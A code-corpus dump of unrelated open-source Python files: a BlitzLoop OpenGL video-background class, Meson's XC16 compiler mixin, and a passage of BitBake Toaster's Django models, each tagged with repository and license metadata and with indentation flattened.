# the Free Software Foundation, either version 2 or version 3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import OpenGL.GL as gl
import ffms
class BackgroundVideo(object):
def __init__(self, song):
self.offset = 0
self.fade_in = 1
self.fade_out = 1
if "video_offset" in song.song:
self.offset = float(song.song["video_offset"])
if "fade_in" in song.song:
self.fade_in = float(song.song["fade_in"])
if "fade_out" in song.song:
self.fade_out = float(song.song["fade_out"])
self.vsource = ffms.VideoSource(song.videofile)
self.vsource.set_output_format([ffms.get_pix_fmt("bgr32")])
self.frameno = 0
self.frame = None
self.timecodes = [i/1000.0 for i in self.vsource.track.timecodes]
self.texid = gl.glGenTextures(1)
frame = self.vsource.get_frame(0)
self.width = frame.ScaledWidth
self.height = frame.ScaledHeight
self.frame = frame.planes[0].copy()
self.sar = self.vsource.properties.SARNum / self.vsource.properties.SARDen
if self.sar == 0:
self.sar = 1
if "video_sar" in song.song:
self.sar = float(song.song["video_sar"])
self.aspect = self.sar * self.width / self.height
def advance(self, time):
if self.frameno >= len(self.timecodes)-1:
return
cur_frame = self.frameno
while time > self.timecodes[self.frameno+1]:
self.frameno += 1
if self.frameno >= len(self.timecodes)-1:
break
if self.frameno != cur_frame:
self.frame = self.vsource.get_frame(self.frameno)
def draw(self, time, display, song_length):
brightness = 1
last_frame = self.timecodes
if time > (song_length - self.fade_out) and self.fade_out:
brightness *= max(0, min(1, (song_length - time) / self.fade_out))
if self.offset < 0:
time += self.offset
if time < self.fade_in and self.fade_in:
brightness *= max(0, min(1, time/self.fade_in))
if self.offset > 0:
time += self.offset
self.advance(time)
data = self.frame.planes[0]
gl.glDisable(gl.GL_BLEND)
gl.glBindTexture(gl.GL_TEXTURE_2D, self.texid)
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR);
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_LINEAR);
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_S, gl.GL_CLAMP);
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_T, gl.GL_CLAMP);
gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, 3,
self.width, self.height, 0,
gl.GL_RGBA, gl.GL_UNSIGNED_BYTE, data)
gl.glActiveTexture(gl.GL_TEXTURE0)
gl.glBindTexture(gl.GL_TEXTURE_2D, self.texid)
gl.glEnable(gl.GL_TEXTURE_2D)
gl.glBegin(gl.GL_TRIANGLE_STRIP)
h = self.height / self.width / self.sar
dh = display.height / display.width
offset = (dh-h) / 2
gl.glColor4f(brightness,brightness,brightness,1)
gl.glTexCoord2f(0,1)
gl.glVertex2f(0,offset)
gl.glTexCoord2f(1,1)
gl.glVertex2f(1,offset)
gl.glTexCoord2f(0,0)
gl.glVertex2f(0,offset+h)
gl.glTexCoord2f(1,0)
gl.glVertex2f(1,offset+h)
gl.glEnd()
gl.glDisable(gl.GL_TEXTURE_2D)
def __del__(self):
gl.glDeleteTextures(self.texid)
| yacoob/blitzloop | blitzloop/ffmsvideo.py | Python | gpl-2.0 | 4,227 |
from .wrapper import external_call
| crevetor/vcrwrapper | vcrwrapper/__init__.py | Python | gpl-2.0 | 35 |
# Copyright 2012-2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Representations specific to the Microchip XC16 C compiler family."""
import os
import typing as T
from ...mesonlib import EnvironmentException
if T.TYPE_CHECKING:
from ...environment import Environment
from ...compilers.compilers import Compiler
else:
# This is a bit clever, for mypy we pretend that these mixins descend from
# Compiler, so we get all of the methods and attributes defined for us, but
# for runtime we make them descend from object (which all classes normally
# do). This gives up DRYer type checking, with no runtime impact
Compiler = object
xc16_buildtype_args = {
'plain': [],
'debug': [],
'debugoptimized': [],
'release': [],
'minsize': [],
'custom': [],
} # type: T.Dict[str, T.List[str]]
xc16_optimization_args = {
'0': ['-O0'],
'g': ['-O0'],
'1': ['-O1'],
'2': ['-O2'],
'3': ['-O3'],
's': ['-Os']
} # type: T.Dict[str, T.List[str]]
xc16_debug_args = {
False: [],
True: []
} # type: T.Dict[bool, T.List[str]]
class Xc16Compiler(Compiler):
id = 'xc16'
def __init__(self) -> None:
if not self.is_cross:
raise EnvironmentException('xc16 supports only cross-compilation.')
# Assembly
self.can_compile_suffixes.add('s')
default_warn_args = [] # type: T.List[str]
self.warn_args = {'0': [],
'1': default_warn_args,
'2': default_warn_args + [],
'3': default_warn_args + []} # type: T.Dict[str, T.List[str]]
def get_always_args(self) -> T.List[str]:
return []
def get_pic_args(self) -> T.List[str]:
# PIC support is not enabled by default for xc16,
# if users want to use it, they need to add the required arguments explicitly
return []
def get_buildtype_args(self, buildtype: str) -> T.List[str]:
return xc16_buildtype_args[buildtype]
def get_pch_suffix(self) -> str:
return 'pch'
def get_pch_use_args(self, pch_dir: str, header: str) -> T.List[str]:
return []
def thread_flags(self, env: 'Environment') -> T.List[str]:
return []
def get_coverage_args(self) -> T.List[str]:
return []
def get_no_stdinc_args(self) -> T.List[str]:
return ['-nostdinc']
def get_no_stdlib_link_args(self) -> T.List[str]:
return ['--nostdlib']
def get_optimization_args(self, optimization_level: str) -> T.List[str]:
return xc16_optimization_args[optimization_level]
def get_debug_args(self, is_debug: bool) -> T.List[str]:
return xc16_debug_args[is_debug]
@classmethod
def unix_args_to_native(cls, args: T.List[str]) -> T.List[str]:
result = []
for i in args:
if i.startswith('-D'):
i = '-D' + i[2:]
if i.startswith('-I'):
i = '-I' + i[2:]
if i.startswith('-Wl,-rpath='):
continue
elif i == '--print-search-dirs':
continue
elif i.startswith('-L'):
continue
result.append(i)
return result
def compute_parameters_with_absolute_paths(self, parameter_list: T.List[str], build_dir: str) -> T.List[str]:
for idx, i in enumerate(parameter_list):
if i[:9] == '-I':
parameter_list[idx] = i[:9] + os.path.normpath(os.path.join(build_dir, i[9:]))
return parameter_list
| mesonbuild/meson | mesonbuild/compilers/mixins/xc16.py | Python | apache-2.0 | 4,081 |
#
# BitBake Toaster Implementation
#
# Copyright (C) 2013 Intel Corporation
#
# SPDX-License-Identifier: GPL-2.0-only
#
from __future__ import unicode_literals
from django.db import models, IntegrityError, DataError
from django.db.models import F, Q, Sum, Count
from django.utils import timezone
from django.utils.encoding import force_bytes
from django.core.urlresolvers import reverse
from django.core import validators
from django.conf import settings
import django.db.models.signals
import sys
import os
import re
import itertools
from signal import SIGUSR1
import logging
logger = logging.getLogger("toaster")
if 'sqlite' in settings.DATABASES['default']['ENGINE']:
from django.db import transaction, OperationalError
from time import sleep
_base_save = models.Model.save
def save(self, *args, **kwargs):
while True:
try:
with transaction.atomic():
return _base_save(self, *args, **kwargs)
except OperationalError as err:
if 'database is locked' in str(err):
logger.warning("%s, model: %s, args: %s, kwargs: %s",
err, self.__class__, args, kwargs)
sleep(0.5)
continue
raise
models.Model.save = save
# HACK: Monkey patch Django to fix 'database is locked' issue
from django.db.models.query import QuerySet
_base_insert = QuerySet._insert
def _insert(self, *args, **kwargs):
with transaction.atomic(using=self.db, savepoint=False):
return _base_insert(self, *args, **kwargs)
QuerySet._insert = _insert
from django.utils import six
def _create_object_from_params(self, lookup, params):
"""
Tries to create an object using passed params.
Used by get_or_create and update_or_create
"""
try:
obj = self.create(**params)
return obj, True
except (IntegrityError, DataError):
exc_info = sys.exc_info()
try:
return self.get(**lookup), False
except self.model.DoesNotExist:
pass
six.reraise(*exc_info)
QuerySet._create_object_from_params = _create_object_from_params
# end of HACK
class GitURLValidator(validators.URLValidator):
import re
regex = re.compile(
r'^(?:ssh|git|http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
def GitURLField(**kwargs):
r = models.URLField(**kwargs)
for i in range(len(r.validators)):
if isinstance(r.validators[i], validators.URLValidator):
r.validators[i] = GitURLValidator()
return r
class ToasterSetting(models.Model):
name = models.CharField(max_length=63)
helptext = models.TextField()
value = models.CharField(max_length=255)
def __unicode__(self):
return "Setting %s = %s" % (self.name, self.value)
class ProjectManager(models.Manager):
def create_project(self, name, release, existing_project=None):
if existing_project and (release is not None):
prj = existing_project
prj.bitbake_version = release.bitbake_version
prj.release = release
# Delete the previous ProjectLayer mappings
for pl in ProjectLayer.objects.filter(project=prj):
pl.delete()
elif release is not None:
prj = self.model(name=name,
bitbake_version=release.bitbake_version,
release=release)
else:
prj = self.model(name=name,
bitbake_version=None,
release=None)
prj.save()
for defaultconf in ToasterSetting.objects.filter(
name__startswith="DEFCONF_"):
name = defaultconf.name[8:]
pv,create = ProjectVariable.objects.get_or_create(project=prj,name=name)
pv.value = defaultconf.value
pv.save()
if release is None:
return prj
for rdl in release.releasedefaultlayer_set.all():
lv = Layer_Version.objects.filter(
layer__name=rdl.layer_name,
release=release).first()
if lv:
ProjectLayer.objects.create(project=prj,
layercommit=lv,
optional=False)
else:
logger.warning("Default project layer %s not found" %
rdl.layer_name)
return prj
# return single object with is_default = True
def get_or_create_default_project(self):
projects = super(ProjectManager, self).filter(is_default=True)
if len(projects) > 1:
raise Exception('Inconsistent project data: multiple ' +
'default projects (i.e. with is_default=True)')
elif len(projects) < 1:
options = {
'name': 'Command line builds',
'short_description':
'Project for builds started outside Toaster',
'is_default': True
}
project = Project.objects.create(**options)
project.save()
return project
else:
return projects[0]
class Project(models.Model):
search_allowed_fields = ['name', 'short_description', 'release__name',
'release__branch_name']
name = models.CharField(max_length=100)
short_description = models.CharField(max_length=50, blank=True)
bitbake_version = models.ForeignKey('BitbakeVersion', null=True)
release = models.ForeignKey("Release", null=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
# This is a horrible hack; since Toaster has no "User" model available when
# running in interactive mode, we can't reference the field here directly
# Instead, we keep a possible null reference to the User id,
# as not to force
# hard links to possibly missing models
user_id = models.IntegerField(null=True)
objects = ProjectManager()
# build directory override (e.g. imported)
builddir = models.TextField()
# merge the Toaster configure attributes directly into the standard conf files
merged_attr = models.BooleanField(default=False)
# set to True for the project which is the default container
# for builds initiated by the command line etc.
is_default= models.BooleanField(default=False)
def __unicode__(self):
return "%s (Release %s, BBV %s)" % (self.name, self.release, self.bitbake_version)
def get_current_machine_name(self):
try:
return self.projectvariable_set.get(name="MACHINE").value
except (ProjectVariable.DoesNotExist,IndexError):
return None;
def get_number_of_builds(self):
"""Return the number of builds which have ended"""
return self.build_set.exclude(
Q(outcome=Build.IN_PROGRESS) |
Q(outcome=Build.CANCELLED)
).count()
def get_last_build_id(self):
try:
return Build.objects.filter( project = self.id ).order_by('-completed_on')[0].id
except (Build.DoesNotExist,IndexError):
return( -1 )
def get_last_outcome(self):
build_id = self.get_last_build_id()
if (-1 == build_id):
return( "" )
try:
return Build.objects.filter( id = build_id )[ 0 ].outcome
except (Build.DoesNotExist,IndexError):
return( "not_found" )
def get_last_target(self):
build_id = self.get_last_build_id()
if (-1 == build_id):
return( "" )
try:
return Target.objects.filter(build = build_id)[0].target
except (Target.DoesNotExist,IndexError):
return( "not_found" )
def get_last_errors(self):
build_id = self.get_last_build_id()
if (-1 == build_id):
return( 0 )
try:
return Build.objects.filter(id = build_id)[ 0 ].errors.count()
except (Build.DoesNotExist,IndexError):
return( "not_found" )
def get_last_warnings(self):
build_id = self.get_last_build_id()
if (-1 == build_id):
return( 0 )
try:
return Build.objects.filter(id = build_id)[ 0 ].warnings.count()
except (Build.DoesNotExist,IndexError):
return( "not_found" )
def get_last_build_extensions(self):
"""
Get list of file name extensions for images produced by the most
recent build
"""
last_build = Build.objects.get(pk = self.get_last_build_id())
return last_build.get_image_file_extensions()
def get_last_imgfiles(self):
build_id = self.get_last_build_id()
if (-1 == build_id):
return( "" )
try:
return Variable.objects.filter(build = build_id, variable_name = "IMAGE_FSTYPES")[ 0 ].variable_value
except (Variable.DoesNotExist,IndexError):
return( "not_found" )
def get_all_compatible_layer_versions(self):
""" Returns Queryset of all Layer_Versions which are compatible with
this project"""
queryset = None
# guard on release, as it can be null
if self.release:
queryset = Layer_Version.objects.filter(
(Q(release=self.release) &
Q(build=None) &
Q(project=None)) |
Q(project=self))
else:
queryset = Layer_Version.objects.none()
return queryset
def get_project_layer_versions(self, pk=False):
""" Returns the Layer_Versions currently added to this project """
layer_versions = self.projectlayer_set.all().values_list('layercommit',
flat=True)
if pk is False:
return Layer_Version.objects.filter(pk__in=layer_versions)
else:
return layer_versions
def get_default_image_recipe(self):
try:
return self.projectvariable_set.get(name="DEFAULT_IMAGE").value
except (ProjectVariable.DoesNotExist,IndexError):
return None;
def get_is_new(self):
return self.get_variable(Project.PROJECT_SPECIFIC_ISNEW)
def get_available_machines(self):
""" Returns QuerySet of all Machines which are provided by the
Layers currently added to the Project """
queryset = Machine.objects.filter(
layer_version__in=self.get_project_layer_versions())
return queryset
def get_all_compatible_machines(self):
""" Returns QuerySet of all the compatible machines available to the
project including ones from Layers not currently added """
queryset = Machine.objects.filter(
layer_version__in=self.get_all_compatible_layer_versions())
return queryset
def get_available_distros(self):
""" Returns QuerySet of all Distros which are provided by the
Layers currently added to the Project """
queryset = Distro.objects.filter(
layer_version__in=self.get_project_layer_versions())
return queryset
def get_all_compatible_distros(self):
""" Returns QuerySet of all the compatible Wind River distros available to the
project including ones from Layers not currently added """
queryset = Distro.objects.filter(
layer_version__in=self.get_all_compatible_layer_versions())
return queryset
def get_available_recipes(self):
""" Returns QuerySet of all the recipes that are provided by layers
added to this project """
queryset = Recipe.objects.filter(
layer_version__in=self.get_project_layer_versions())
return queryset
def get_all_compatible_recipes(self):
""" Returns QuerySet of all the compatible Recipes available to the
project including ones from Layers not currently added """
queryset = Recipe.objects.filter(
layer_version__in=self.get_all_compatible_layer_versions()).exclude(name__exact='')
return queryset
# Project Specific status management
PROJECT_SPECIFIC_STATUS = 'INTERNAL_PROJECT_SPECIFIC_STATUS'
PROJECT_SPECIFIC_CALLBACK = 'INTERNAL_PROJECT_SPECIFIC_CALLBACK'
PROJECT_SPECIFIC_ISNEW = 'INTERNAL_PROJECT_SPECIFIC_ISNEW'
PROJECT_SPECIFIC_DEFAULTIMAGE = 'PROJECT_SPECIFIC_DEFAULTIMAGE'
PROJECT_SPECIFIC_NONE = ''
PROJECT_SPECIFIC_NEW = '1'
PROJECT_SPECIFIC_EDIT = '2'
PROJECT_SPECIFIC_CLONING = '3'
PROJECT_SPECIFIC_CLONING_SUCCESS = '4'
PROJECT_SPECIFIC_CLONING_FAIL = '5'
def get_variable(self,variable,default_value = ''):
try:
return self.projectvariable_set.get(name=variable).value
except (ProjectVariable.DoesNotExist,IndexError):
return default_value
def set_variable(self,variable,value):
pv,create = ProjectVariable.objects.get_or_create(project = self, name = variable)
pv.value = value
pv.save()
def get_default_image(self):
return self.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE)
def schedule_build(self):
from bldcontrol.models import BuildRequest, BRTarget, BRLayer
from bldcontrol.models import BRBitbake, BRVariable
try:
now = timezone.now()
build = Build.objects.create(project=self,
completed_on=now,
started_on=now)
br = BuildRequest.objects.create(project=self,
state=BuildRequest.REQ_QUEUED,
build=build)
BRBitbake.objects.create(req=br,
giturl=self.bitbake_version.giturl,
commit=self.bitbake_version.branch,
dirpath=self.bitbake_version.dirpath)
for t in self.projecttarget_set.all():
BRTarget.objects.create(req=br, target=t.target, task=t.task)
Target.objects.create(build=br.build, target=t.target,
task=t.task)
# If we're about to build a custom image recipe make sure
# that layer is currently in the project before we create the
# BRLayer objects
customrecipe = CustomImageRecipe.objects.filter(
name=t.target,
project=self).first()
if customrecipe:
ProjectLayer.objects.get_or_create(
project=self,
layercommit=customrecipe.layer_version,
optional=False)
for l in self.projectlayer_set.all().order_by("pk"):
commit = l.layercommit.get_vcs_reference()
logger.debug("Adding layer to build %s" %
l.layercommit.layer.name)
BRLayer.objects.create(
req=br,
name=l.layercommit.layer.name,
giturl=l.layercommit.layer.vcs_url,
commit=commit,
dirpath=l.layercommit.dirpath,
layer_version=l.layercommit,
local_source_dir=l.layercommit.layer.local_source_dir
)
for v in self.projectvariable_set.all():
BRVariable.objects.create(req=br, name=v.name, value=v.value)
try:
br.build.machine = self.projectvariable_set.get(
name='MACHINE').value
br.build.save()
except ProjectVariable.DoesNotExist:
pass
br.save()
signal_runbuilds()
except Exception:
# revert the build request creation since we're not done cleanly
br.delete()
raise
return br
class Build(models.Model):
SUCCEEDED = 0
FAILED = 1
IN_PROGRESS = 2
CANCELLED = 3
BUILD_OUTCOME = (
(SUCCEEDED, 'Succeeded'),
(FAILED, 'Failed'),
(IN_PROGRESS, 'In Progress'),
(CANCELLED, 'Cancelled'),
)
search_allowed_fields = ['machine', 'cooker_log_path', "target__target", "target__target_image_file__file_name"]
project = models.ForeignKey(Project) # must have a project
machine = models.CharField(max_length=100)
distro = models.CharField(max_length=100)
distro_version = models.CharField(max_length=100)
started_on = models.DateTimeField()
completed_on = models.DateTimeField()
outcome = models.IntegerField(choices=BUILD_OUTCOME, default=IN_PROGRESS)
cooker_log_path = models.CharField(max_length=500)
build_name = models.CharField(max_length=100, default='')
bitbake_version = models.CharField(max_length=50)
# number of recipes to parse for this build
recipes_to_parse = models.IntegerField(default=1)
# number of recipes parsed so far for this build
recipes_parsed = models.IntegerField(default=1)
# number of repos to clone for this build
repos_to_clone = models.IntegerField(default=1)
# number of repos cloned so far for this build (default off)
repos_cloned = models.IntegerField(default=1)
# Hint on current progress item
progress_item = models.CharField(max_length=40)
@staticmethod
def get_recent(project=None):
"""
Return recent builds as a list; if project is set, only return
builds for that project
"""
builds = Build.objects.all()
if project:
builds = builds.filter(project=project)
finished_criteria = \
Q(outcome=Build.SUCCEEDED) | \
Q(outcome=Build.FAILED) | \
Q(outcome=Build.CANCELLED)
recent_builds = list(itertools.chain(
builds.filter(outcome=Build.IN_PROGRESS).order_by("-started_on"),
builds.filter(finished_criteria).order_by("-completed_on")[:3]
))
# add percentage done property to each build; this is used
# to show build progress in mrb_section.html
for build in recent_builds:
build.percentDone = build.completeper()
build.outcomeText = build.get_outcome_text()
return recent_builds
def started(self):
"""
As build variables are only added for a build when its BuildStarted event
is received, a build with no build variables is counted as
"in preparation" and not properly started yet. This method
will return False if a build has no build variables (it never properly
started), or True otherwise.
Note that this is a temporary workaround for the fact that we don't
have a fine-grained state variable on a build which would allow us
to record "in progress" (BuildStarted received) vs. "in preparation".
"""
variables = Variable.objects.filter(build=self)
return len(variables) > 0
def completeper(self):
tf = Task.objects.filter(build = self)
tfc = tf.count()
if tfc > 0:
completeper = tf.exclude(outcome=Task.OUTCOME_NA).count()*100 // tfc
else:
completeper = 0
return completeper
def eta(self):
eta = timezone.now()
completeper = self.completeper()
if self.completeper() > 0:
eta += ((eta - self.started_on)*(100-completeper))/completeper
return eta
def has_images(self):
"""
Returns True if at least one of the targets for this build has an
image file associated with it, False otherwise
"""
targets = Target.objects.filter(build_id=self.id)
has_images = False
for target in targets:
if target.has_images():
has_images = True
break
return has_images
def has_image_recipes(self):
"""
Returns True if a build has any targets which were built from
image recipes.
"""
image_recipes = self.get_image_recipes()
return len(image_recipes) > 0
def get_image_file_extensions(self):
"""
Get string of file name extensions for images produced by this build;
note that this is the actual list of extensions stored on Target objects
for this build, and not the value of IMAGE_FSTYPES.
Returns comma-separated string, e.g. "vmdk, ext4"
"""
extensions = []
targets = Target.objects.filter(build_id = self.id)
for target in targets:
if not target.is_image:
continue
target_image_files = Target_Image_File.objects.filter(
target_id=target.id)
for target_image_file in target_image_files:
extensions.append(target_image_file.suffix)
extensions = list(set(extensions))
extensions.sort()
return ', '.join(extensions)
def get_image_fstypes(self):
"""
Get the IMAGE_FSTYPES variable value for this build as a de-duplicated
list of image file suffixes.
"""
image_fstypes = Variable.objects.get(
build=self, variable_name='IMAGE_FSTYPES').variable_value
return list(set(re.split(r' {1,}', image_fstypes)))
def get_sorted_target_list(self):
tgts = Target.objects.filter(build_id = self.id).order_by( 'target' );
return( tgts );
def get_recipes(self):
"""
Get the recipes related to this build;
note that the related layer versions and layers are also prefetched
by this query, as this queryset can be sorted by these objects in the
build recipes view; prefetching them here removes the need
for another query in that view
"""
layer_versions = Layer_Version.objects.filter(build=self)
criteria = Q(layer_version__id__in=layer_versions)
return Recipe.objects.filter(criteria) \
.select_related('layer_version', 'layer_version__layer')
def get_image_recipes(self):
"""
Returns a list of image Recipes (custom and built-in) related to this
build, sorted by name; note that this has to be done in two steps, as
there's no way to get all the custom image recipes and image recipes
in one query
"""
custom_image_recipes = self.get_custom_image_recipes()
custom_image_recipe_names = custom_image_recipes.values_list('name', flat=True)
not_custom_image_recipes = ~Q(name__in=custom_image_recipe_names) & \
Q(is_image=True)
built_image_recipes = self.get_recipes().filter(not_custom_image_recipes)
# append to the custom image recipes and sort
customisable_image_recipes = list(
itertools.chain(custom_image_recipes, built_image_recipes)
)
return sorted(customisable_image_recipes, key=lambda recipe: recipe.name)
def get_custom_image_recipes(self):
"""
Returns a queryset of CustomImageRecipes related to this build,
sorted by name
"""
built_recipe_names = self.get_recipes().values_list('name', flat=True)
criteria = Q(name__in=built_recipe_names) & Q(project=self.project)
queryset = CustomImageRecipe.objects.filter(criteria).order_by('name')
return queryset
def get_outcome_text(self):
return Build.BUILD_OUTCOME[int(self.outcome)][1]
@property
def failed_tasks(self):
""" Get failed tasks for the build """
tasks = self.task_build.all()
return tasks.filter(order__gt=0, outcome=Task.OUTCOME_FAILED)
@property
def errors(self):
return (self.logmessage_set.filter(level=LogMessage.ERROR) |
self.logmessage_set.filter(level=LogMessage.EXCEPTION) |
self.logmessage_set.filter(level=LogMessage.CRITICAL))
@property
def warnings(self):
return self.logmessage_set.filter(level=LogMessage.WARNING)
@property
def timespent(self):
return self.completed_on - self.started_on
@property
def timespent_seconds(self):
return self.timespent.total_seconds()
@property
def target_labels(self):
"""
Sorted (a-z) "target1:task, target2, target3" etc. string for all
targets in this build
"""
targets = self.target_set.all()
target_labels = [target.target +
(':' + target.task if target.task else '')
for target in targets]
target_labels.sort()
return target_labels
def get_buildrequest(self):
buildrequest = None
if hasattr(self, 'buildrequest'):
buildrequest = self.buildrequest
return buildrequest
def is_queued(self):
from bldcontrol.models import BuildRequest
buildrequest = self.get_buildrequest()
if buildrequest:
return buildrequest.state == BuildRequest.REQ_QUEUED
else:
return False
def is_cancelling(self):
from bldcontrol.models import BuildRequest
buildrequest = self.get_buildrequest()
if buildrequest:
return self.outcome == Build.IN_PROGRESS and \
buildrequest.state == BuildRequest.REQ_CANCELLING
else:
return False
def is_cloning(self):
"""
True if the build is still cloning repos
"""
return self.outcome == Build.IN_PROGRESS and \
self.repos_cloned < self.repos_to_clone
def is_parsing(self):
"""
True if the build is still parsing recipes
"""
return self.outcome == Build.IN_PROGRESS and \
self.recipes_parsed < self.recipes_to_parse
def is_starting(self):
"""
True if the build has no completed tasks yet and is still just starting
tasks.
Note that the mechanism for testing whether a Task is "done" is whether
its outcome field is set, as per the completeper() method.
"""
return self.outcome == Build.IN_PROGRESS and \
self.task_build.exclude(outcome=Task.OUTCOME_NA).count() == 0
def get_state(self):
"""
Get the state of the build; one of 'Succeeded', 'Failed', 'In Progress',
'Cancelled' (Build outcomes); or 'Queued', 'Cancelling' (states
dependent on the BuildRequest state).
This works around the fact that we have BuildRequest states as well
as Build states, but really we just want to know the state of the build.
"""
if self.is_cancelling():
return 'Cancelling';
elif self.is_queued():
return 'Queued'
elif self.is_cloning():
return 'Cloning'
elif self.is_parsing():
return 'Parsing'
elif self.is_starting():
return 'Starting'
else:
return self.get_outcome_text()
def __str__(self):
return "%d %s %s" % (self.id, self.project, ",".join([t.target for t in self.target_set.all()]))
class ProjectTarget(models.Model):
project = models.ForeignKey(Project)
target = models.CharField(max_length=100)
task = models.CharField(max_length=100, null=True)
class Target(models.Model):
search_allowed_fields = ['target', 'file_name']
build = models.ForeignKey(Build)
target = models.CharField(max_length=100)
task = models.CharField(max_length=100, null=True)
is_image = models.BooleanField(default = False)
image_size = models.IntegerField(default=0)
license_manifest_path = models.CharField(max_length=500, null=True)
package_manifest_path = models.CharField(max_length=500, null=True)
def package_count(self):
return Target_Installed_Package.objects.filter(target_id__exact=self.id).count()
def __unicode__(self):
return self.target
def get_similar_targets(self):
"""
Get target sfor the same machine, task and target name
(e.g. 'core-image-minimal') from a successful build for this project
(but excluding this target).
Note that we only look for targets built by this project because
projects can have different configurations from each other, and put
their artifacts in different directories.
The possibility of error when retrieving candidate targets
is minimised by the fact that bitbake will rebuild artifacts if MACHINE
(or various other variables) change. In this case, there is no need to
clone artifacts from another target, as those artifacts will have
been re-generated for this target anyway.
"""
query = ~Q(pk=self.pk) & \
Q(target=self.target) & \
Q(build__machine=self.build.machine) & \
Q(build__outcome=Build.SUCCEEDED) & \
Q(build__project=self.build.project)
return Target.objects.filter(query)
def get_similar_target_with_image_files(self):
"""
Get the most recent similar target with Target_Image_Files associated
with it, for the purpose of cloning those files onto this target.
"""
similar_target = None
candidates = self.get_similar_targets()
if candidates.count() == 0:
return similar_target
task_subquery = Q(task=self.task)
# we can look for a 'build' task if this task is a 'populate_sdk_ext'
# task, as the latter also creates images; and vice versa; note that
# 'build' targets can have their task set to '';
# also note that 'populate_sdk' does not produce image files
image_tasks = [
'', # aka 'build'
'build',
'image',
'populate_sdk_ext'
]
if self.task in image_tasks:
task_subquery = Q(task__in=image_tasks)
# annotate with the count of files, to exclude any targets which
# don't have associated files
candidates = candidates.annotate(num_files=Count('target_image_file'))
query = task_subquery & Q(num_files__gt=0)
candidates = candidates.filter(query)
if candidates.count() > 0:
candidates.order_by('build__completed_on')
similar_target = candidates.last()
return similar_target
def get_similar_target_with_sdk_files(self):
"""
Get the most recent similar target with TargetSDKFiles associated
with it, for the purpose of cloning those files onto this target.
"""
similar_target = None
candidates = self.get_similar_targets()
if candidates.count() == 0:
return similar_target
# annotate with the count of files, to exclude any targets which
# don't have associated files
candidates = candidates.annotate(num_files=Count('targetsdkfile'))
query = Q(task=self.task) & Q(num_files__gt=0)
candidates = candidates.filter(query)
if candidates.count() > 0:
candidates.order_by('build__completed_on')
similar_target = candidates.last()
return similar_target
def clone_image_artifacts_from(self, target):
"""
Make clones of the Target_Image_Files and TargetKernelFile objects
associated with Target target, then associate them with this target.
Note that for Target_Image_Files, we only want files from the previous
build whose suffix matches one of the suffixes defined in this
target's build's IMAGE_FSTYPES configuration variable. This prevents the
Target_Image_File object for an ext4 image being associated with a
target for a project which didn't produce an ext4 image (for example).
Also sets the license_manifest_path and package_manifest_path
of this target to the same path as that of target being cloned from, as
the manifests are also build artifacts but are treated differently.
"""
image_fstypes = self.build.get_image_fstypes()
# filter out any image files whose suffixes aren't in the
# IMAGE_FSTYPES suffixes variable for this target's build
image_files = [target_image_file \
for target_image_file in target.target_image_file_set.all() \
if target_image_file.suffix in image_fstypes]
for image_file in image_files:
image_file.pk = None
image_file.target = self
image_file.save()
kernel_files = target.targetkernelfile_set.all()
for kernel_file in kernel_files:
kernel_file.pk = None
kernel_file.target = self
kernel_file.save()
self.license_manifest_path = target.license_manifest_path
self.package_manifest_path = target.package_manifest_path
self.save()
def clone_sdk_artifacts_from(self, target):
"""
Clone TargetSDKFile objects from target and associate them with this
target.
"""
sdk_files = target.targetsdkfile_set.all()
for sdk_file in sdk_files:
sdk_file.pk = None
sdk_file.target = self
sdk_file.save()
def has_images(self):
"""
Returns True if this target has one or more image files attached to it.
"""
return self.target_image_file_set.all().count() > 0
# kernel artifacts for a target: bzImage and modules*
class TargetKernelFile(models.Model):
target = models.ForeignKey(Target)
file_name = models.FilePathField()
file_size = models.IntegerField()
@property
def basename(self):
return os.path.basename(self.file_name)
# SDK artifacts for a target: sh and manifest files
class TargetSDKFile(models.Model):
target = models.ForeignKey(Target)
file_name = models.FilePathField()
file_size = models.IntegerField()
@property
def basename(self):
return os.path.basename(self.file_name)
class Target_Image_File(models.Model):
# valid suffixes for image files produced by a build
SUFFIXES = {
'btrfs', 'container', 'cpio', 'cpio.gz', 'cpio.lz4', 'cpio.lzma',
'cpio.xz', 'cramfs', 'ext2', 'ext2.bz2', 'ext2.gz', 'ext2.lzma',
'ext3', 'ext3.gz', 'ext4', 'ext4.gz', 'f2fs', 'hddimg', 'iso', 'jffs2',
'jffs2.sum', 'multiubi', 'squashfs', 'squashfs-lz4', 'squashfs-lzo',
'squashfs-xz', 'tar', 'tar.bz2', 'tar.gz', 'tar.lz4', 'tar.xz', 'ubi',
'ubifs', 'wic', 'wic.bz2', 'wic.gz', 'wic.lzma'
}
target = models.ForeignKey(Target)
file_name = models.FilePathField(max_length=254)
file_size = models.IntegerField()
@property
def suffix(self):
"""
Suffix for image file, minus leading "."
"""
for suffix in Target_Image_File.SUFFIXES:
